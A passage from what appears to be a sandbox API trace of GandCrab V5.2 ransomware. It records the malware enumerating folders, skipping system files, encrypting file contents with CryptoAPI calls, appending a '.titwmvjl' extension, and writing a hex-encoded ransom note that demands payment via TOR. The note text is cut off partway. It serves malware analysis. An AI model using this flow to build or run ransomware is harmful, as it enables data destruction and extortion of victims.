lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259ec98, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259ec98*=0x21c, lpOverlapped=0x0) returned 1 [0088.648] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.652] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.652] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.652] CloseHandle (hObject=0x2c4) returned 1 [0088.653] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\alhA3aUz\\rF0F83OeRTkaj.swf" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\f_rdbnja3k3ozw0f\\fpvesj\\alha3auz\\rf0f83oertkaj.swf"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\alhA3aUz\\rF0F83OeRTkaj.swf.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\f_rdbnja3k3ozw0f\\fpvesj\\alha3auz\\rf0f83oertkaj.swf.titwmvjl"), dwFlags=0x1) returned 1 [0088.653] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.653] FindNextFileW (in: hFindFile=0x5035b8, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0088.654] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0088.654] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0088.654] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\alhA3aUz\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\alhA3aUz\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\alhA3aUz\\TITWMVJL-DECRYPT.txt" [0088.654] lstrlenW (lpString=".titwmvjl") returned 9 [0088.654] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\alhA3aUz\\TITWMVJL-DECRYPT.txt") returned 83 [0088.654] VirtualAlloc (lpAddress=0x0, dwSize=0xe6, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0088.654] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\alhA3aUz\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 92 [0088.654] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\alhA3aUz\\TITWMVJL-DECRYPT.txt") returned 83 [0088.654] lstrlenW (lpString=".txt") returned 4 [0088.654] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0088.654] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".txt ") returned 5 [0088.654] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0088.654] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.654] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\alhA3aUz\\TITWMVJL-DECRYPT.txt") returned 83 [0088.654] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\alhA3aUz\\TITWMVJL-DECRYPT.txt") returned 83 [0088.654] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0088.654] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0088.654] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0088.654] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0088.654] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0088.654] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0088.654] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0088.654] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0088.655] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.655] FindNextFileW (in: hFindFile=0x5035b8, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 0 [0088.655] FindClose (in: hFindFile=0x5035b8 | out: hFindFile=0x5035b8) returned 1 [0088.655] CloseHandle (hObject=0x2bc) returned 1 [0088.655] FindNextFileW (in: hFindFile=0x503378, lpFindFileData=0x259effc | out: lpFindFileData=0x259effc) returned 1 [0088.655] lstrcmpW (lpString1="BNufPFwfyiVdnSt5.csv", lpString2=".") returned 1 [0088.655] lstrcmpW (lpString1="BNufPFwfyiVdnSt5.csv", lpString2="..") returned 1 [0088.655] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\", lpString2="BNufPFwfyiVdnSt5.csv" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\BNufPFwfyiVdnSt5.csv") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\BNufPFwfyiVdnSt5.csv" [0088.655] lstrlenW (lpString=".titwmvjl") returned 9 [0088.655] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\BNufPFwfyiVdnSt5.csv") returned 74 [0088.655] VirtualAlloc (lpAddress=0x0, dwSize=0xd4, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0088.656] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\BNufPFwfyiVdnSt5.csv.titwmvjl") returned 83 [0088.656] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\BNufPFwfyiVdnSt5.csv") returned 74 [0088.656] lstrlenW (lpString=".csv") returned 4 [0088.656] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0088.656] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".csv ") returned 5 [0088.656] lstrcmpiW (lpString1=".csv", lpString2=".titwmvjl") returned -1 [0088.656] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.656] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\BNufPFwfyiVdnSt5.csv") returned 74 [0088.656] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\BNufPFwfyiVdnSt5.csv") returned 74 [0088.656] lstrcmpiW (lpString1="BNufPFwfyiVdnSt5.csv", lpString2="desktop.ini") returned -1 [0088.656] lstrcmpiW (lpString1="BNufPFwfyiVdnSt5.csv", lpString2="autorun.inf") returned 1 [0088.656] lstrcmpiW (lpString1="BNufPFwfyiVdnSt5.csv", lpString2="ntuser.dat") returned -1 [0088.656] lstrcmpiW (lpString1="BNufPFwfyiVdnSt5.csv", lpString2="iconcache.db") returned -1 [0088.656] lstrcmpiW (lpString1="BNufPFwfyiVdnSt5.csv", lpString2="bootsect.bak") returned -1 [0088.656] lstrcmpiW (lpString1="BNufPFwfyiVdnSt5.csv", lpString2="boot.ini") returned -1 [0088.656] lstrcmpiW (lpString1="BNufPFwfyiVdnSt5.csv", lpString2="ntuser.dat.log") returned -1 [0088.656] lstrcmpiW (lpString1="BNufPFwfyiVdnSt5.csv", lpString2="thumbs.db") returned -1 [0088.656] lstrcmpiW (lpString1="BNufPFwfyiVdnSt5.csv", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0088.656] lstrcmpiW (lpString1="BNufPFwfyiVdnSt5.csv", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0088.656] lstrcmpiW (lpString1="BNufPFwfyiVdnSt5.csv", lpString2="KRAB-DECRYPT.html") returned -1 [0088.656] lstrcmpiW (lpString1="BNufPFwfyiVdnSt5.csv", lpString2="CRAB-DECRYPT.html") returned -1 [0088.656] lstrcmpiW (lpString1="BNufPFwfyiVdnSt5.csv", lpString2="KRAB-DECRYPT.txt") returned -1 [0088.656] lstrcmpiW (lpString1="BNufPFwfyiVdnSt5.csv", lpString2="CRAB-DECRYPT.txt") returned -1 [0088.656] lstrcmpiW (lpString1="BNufPFwfyiVdnSt5.csv", lpString2="ntldr") returned -1 [0088.656] lstrcmpiW (lpString1="BNufPFwfyiVdnSt5.csv", lpString2="NTDETECT.COM") returned -1 [0088.656] lstrcmpiW (lpString1="BNufPFwfyiVdnSt5.csv", lpString2="Bootfont.bin") returned -1 [0088.656] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\BNufPFwfyiVdnSt5.csv") returned 74 [0088.656] lstrlenW (lpString=".csv") returned 4 [0088.656] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0088.657] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".csv ") returned 5 [0088.657] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.657] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0088.657] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\BNufPFwfyiVdnSt5.csv" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\f_rdbnja3k3ozw0f\\fpvesj\\bnufpfwfyivdnst5.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2bc [0088.658] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.658] ReadFile (in: hFile=0x2bc, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259ef48, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259ef48*=0x21c, lpOverlapped=0x0) returned 1 [0088.658] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.658] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.658] CryptAcquireContextW (in: phProv=0x259ee78, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ee78*=0x4c9980) returned 1 [0088.659] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0088.660] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0088.660] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0088.660] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259ef04 | out: pbBuffer=0x259ef04) returned 1 [0088.660] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.660] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0088.660] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.660] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.660] CryptAcquireContextW (in: phProv=0x259ee78, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ee78*=0x4c9980) returned 1 [0088.662] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0088.662] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0088.662] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0088.662] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259ef24 | out: pbBuffer=0x259ef24) returned 1 [0088.662] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.662] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0088.662] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.662] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.663] CryptAcquireContextW (in: phProv=0x259ee6c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ee6c*=0x4c9980) returned 1 [0088.664] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.664] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259ee70 | out: phKey=0x259ee70*=0x503578) returned 1 [0088.664] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.664] CryptGetKeyParam (in: hKey=0x503578, dwParam=0x8, pbData=0x259ee64, pdwDataLen=0x259ee68, dwFlags=0x0 | out: pbData=0x259ee64*=0x800, pdwDataLen=0x259ee68*=0x4) returned 1 [0088.664] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.665] CryptEncrypt (in: hKey=0x503578, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259ee9c*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259ee9c*=0x100) returned 1 [0088.665] GetLastError () returned 0x0 [0088.665] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.665] CryptDestroyKey (hKey=0x503578) returned 1 [0088.665] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.665] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0088.665] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.665] CryptAcquireContextW (in: phProv=0x259ee6c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ee6c*=0x4c9980) returned 1 [0088.666] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.666] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259ee70 | out: phKey=0x259ee70*=0x503478) returned 1 [0088.667] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.667] CryptGetKeyParam (in: hKey=0x503478, dwParam=0x8, pbData=0x259ee64, pdwDataLen=0x259ee68, dwFlags=0x0 | out: pbData=0x259ee64*=0x800, pdwDataLen=0x259ee68*=0x4) returned 1 [0088.667] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.667] CryptEncrypt (in: hKey=0x503478, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259ee9c*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259ee9c*=0x100) returned 1 [0088.667] GetLastError () returned 0x0 [0088.667] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.667] CryptDestroyKey (hKey=0x503478) returned 1 [0088.667] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.667] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0088.667] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0088.668] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0088.668] ReadFile (in: hFile=0x2bc, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259ef48, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259ef48*=0x32a8, lpOverlapped=0x0) returned 1 [0088.674] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0xffffcd58, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.674] WriteFile (in: hFile=0x2bc, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x32a8, lpNumberOfBytesWritten=0x259ef2c, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259ef2c*=0x32a8, lpOverlapped=0x0) returned 1 [0088.675] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.675] WriteFile (in: hFile=0x2bc, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259ef2c, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259ef2c*=0x21c, lpOverlapped=0x0) returned 1 [0088.676] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.680] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.680] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.680] CloseHandle (hObject=0x2bc) returned 1 [0088.680] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\BNufPFwfyiVdnSt5.csv" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\f_rdbnja3k3ozw0f\\fpvesj\\bnufpfwfyivdnst5.csv"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\BNufPFwfyiVdnSt5.csv.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\f_rdbnja3k3ozw0f\\fpvesj\\bnufpfwfyivdnst5.csv.titwmvjl"), dwFlags=0x1) returned 1 [0088.681] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.681] FindNextFileW (in: hFindFile=0x503378, lpFindFileData=0x259effc | out: lpFindFileData=0x259effc) returned 1 [0088.681] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0088.681] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0088.681] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\d2ca4a09d2ca4deb61a.lock" [0088.681] lstrlenW (lpString=".titwmvjl") returned 9 [0088.681] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\d2ca4a09d2ca4deb61a.lock") returned 78 [0088.681] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0088.682] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 87 [0088.682] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\d2ca4a09d2ca4deb61a.lock") returned 78 [0088.682] lstrlenW (lpString=".lock") returned 5 [0088.682] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0088.682] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".lock ") returned 6 [0088.682] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.682] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.682] FindNextFileW (in: hFindFile=0x503378, lpFindFileData=0x259effc | out: lpFindFileData=0x259effc) returned 1 [0088.682] lstrcmpW (lpString1="iS9EkW", lpString2=".") returned 1 [0088.682] lstrcmpW (lpString1="iS9EkW", lpString2="..") returned 1 [0088.682] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\", lpString2="iS9EkW" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\iS9EkW") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\iS9EkW" [0088.682] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\iS9EkW", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\iS9EkW\\") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\iS9EkW\\" [0088.682] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0088.682] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0088.683] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0088.683] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0088.683] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0088.683] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0088.683] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0088.683] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0088.683] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0088.683] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.683] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0088.683] wsprintfW (in: param_1=0x1e70200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\iS9EkW\\\\TITWMVJL-DECRYPT.txt") returned 82 [0088.684] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\iS9EkW\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\f_rdbnja3k3ozw0f\\fpvesj\\is9ekw\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2bc [0088.684] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x